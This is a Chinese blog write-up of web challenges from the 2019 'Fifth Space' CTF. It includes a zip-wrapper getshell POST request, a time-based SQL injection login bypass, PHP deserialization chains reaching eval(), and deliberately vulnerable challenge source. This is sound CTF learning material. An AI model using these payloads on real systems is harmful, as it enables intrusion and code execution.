“第五空间”网络安全大赛

“第五空间”网络安全大赛


一更 2019.8.23

二更 2019.9.1


一、前言

本次比赛没有腥风血雨,没有酣畅淋漓,从早到晚,只做出来一道题,还是签到题,还是在将近中午的时候看了主办方发在平台上极不显眼的公告。。。。。。

(中年大叔自闭中)

二、题解

还是具体讲一下部分题的解法吧,本人水平不胜菜鸡,实感惭愧

1.空性

avatar

查看源码,发现用户名和密码是本地JS校验,查看JS源码得知用户名是Youguess,密码随意

avatar

还可以直接跳转到http://111.33.164.4:10003/151912db206ee052.php

avatar

之后就没有思路了,,,,

(更新)

存在文件泄露http://111.33.164.4:10003/.151912db206ee052.php.swp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
4 error_reporting(0);
5 class First{
6 function firstlevel(){
7 $a='whoami';
8 extract($_GET);
9 $fname = $_GET['fname']?$_GET['fname']:'./js/ctf.js';
10 $content=trim(file_get_contents($fname));
11 if($a==$content)
12 {
13 echo 'ok';;
14 else
15 {
16 echo '听说你的Linux用的很6?';
17 }
18 }
19 }
20 $execfirst = new First();
21 $execfirst -> firstlevel();

存在变量覆盖,之后显示一个新的地址

2d019a311aaa30427.php?refer=df53ca268240ca76670c8566ee54568a&t=20190828&dtype=computer&file=3792689baaabc7eb&hash256=9c062d7697674fb92d0a03c2bf3b6ad6

上传zip,然后利用zip伪协议包含getshell。

1
2
3
4
5
6
7
8
9
10
11
12
POST /2d019a311aaa30427.php?refer=df53ca268240ca76670c8566ee54568a&t=20190828&dtype=com
puter&file=?&file=zip://upload/6e5555b6856e20.zip%231&hash256=25db8caabd7e5c2b6976fa657
112c4b7 HTTP/1.1
Host: 111.33.164.4:10003
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
0=cat flagishere/c5a3038d0aeb393711c53abe41dd15f2.php

2.空相

题目提示有个参数叫id,遂尝试/?id=1, /?id=2, /?id=1 and 2

avatar
(这是id=1 and 2)

avatar
(这是id=2)

告诉了我们一个新的文件 ./25d99be830ad95b02f6f82235c8edcf7.php,访问得到一串乱码

avatar

看来和token有关,公告说token是登录时下发的,那就截取登录响应包获得token(官方告诉在浏览器里找,不过我没找到)

获取token后输入……/25d99be830ad95b02f6f82235c8edcf7.php/?token=……就能得到flag

3.五叶

开局一个login界面,尝试普通的sql注入,发现= ‘ and or等均被过滤,遂卡住,,,学长提示:

user=admin&password=1’||IF(username regexp’^admin$’,1,0)||sleep(0.5))#–+a&login=Login

成功登录

avatar

继续访问该php,发现还是需要token,在url后添加/?token=xxxx后可得flag

该题重点难点在于如何绕过比较严格的非法字符检测,具体原理有待分析

以下补充内容来自学长的wp:

4.六尘

这个网站curl能ssrf,但是没啥用,通过其他题目得知通过存在一个flagishere获取利用token取得的flag。访问http://111.33.164.4:10005/flagishere/后发现存在目录遍历,于是直接提交token获取flag。

http://111.33.164.4:10005/flagishere/6be8b547d6db1d213c1ceecc30b3cb24.php?token=1DJAVU22DOAFE800000020PIO5JH0MHN

5.八苦

http://111.33.164.4:10004/index.phps 存在代码泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
error_reporting(0);
class Test{
protected $careful=1;
public $securuty;
public function __wakeup(){
if($this->careful===1){
phpinfo(); // step 1: read source,get phpinfo and read it carefullt
}
}
public function __get($name){
return $this->securuty[$name];
}
public function __call($param1,$param2){
var_dump(11);
if($this->{$param1}){
eval('$a='.$_GET['dangerous'].';');
}
}
}
class User{
public $user;
public function __wakeup(){
$this->user=new Welcome();
$this->user->say_hello();
}
}
// $string=$_GET['foo']??$a;
// unserialize($string);

发现没法利用,但可以反序列化执行phpinfo。

1
http://111.33.164.4:10004/index.php?foo=O%3A4%3A%22Test%22%3A2%3A%7Bs%3A10%3A%22%00%2A%00careful%22%3Bi%3A1%3Bs%3A8%3A%22securuty%22%3BN%3B%7D

发现有preload配置,加载此文件http://111.33.164.4:10004/this_is_a_preload.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

class Welcome{
public function say_hello(){
echo "welcome
"
;

}
}
class Welcome_again{
public $willing;
public $action;
public function __construct(){
$this->action=new Welcome;
}
public function __destruct(){
if($this->willing){
$this->action->say_hello();
}
}
}
highlight_file(__FILE__)
?>

然后就可以通过Welcome_again进行call调用,通过eval执行代码。

1
2
3
4
http://111.33.164.4:10004/index.php?foo=O%3A13%3A%22Welcome_again%22%3A2%3A%7Bs%3A7%3A%
22willing%22%3Bi%3A1%3Bs%3A6%3A%22action%22%3BO%3A4%3A%22Test%22%3A3%3A%7Bs%3A10%3A%22%
00%2A%00careful%22%3Bi%3A0%3Bs%3A8%3A%22securuty%22%3BN%3Bs%3A9%3A%22say_hello%22%3Bs%3
A4%3A%22null%22%3B%7D%7D&dangerous=phpinfo();

三、总结

这次比赛总的来说或许难度较大,但是成功暴露了我的知识的欠缺,尤其是在某个方面深入程度严重不足,pwn更是致命的弱点,全程一道pwn都没有做出来过,实在是惭愧。但我觉得如果开荒时期能有高人指点,或许能少走一些弯路,提高一些效率。

吐槽一波南开的服务器平台,点一下卡一年,装备不花一分钱

作者

Luan Blesson

发布于

2019-08-28

更新于

2020-10-05

许可协议

评论

Your browser is out-of-date!

Update your browser to view this website correctly.&npsb;Update my browser now

×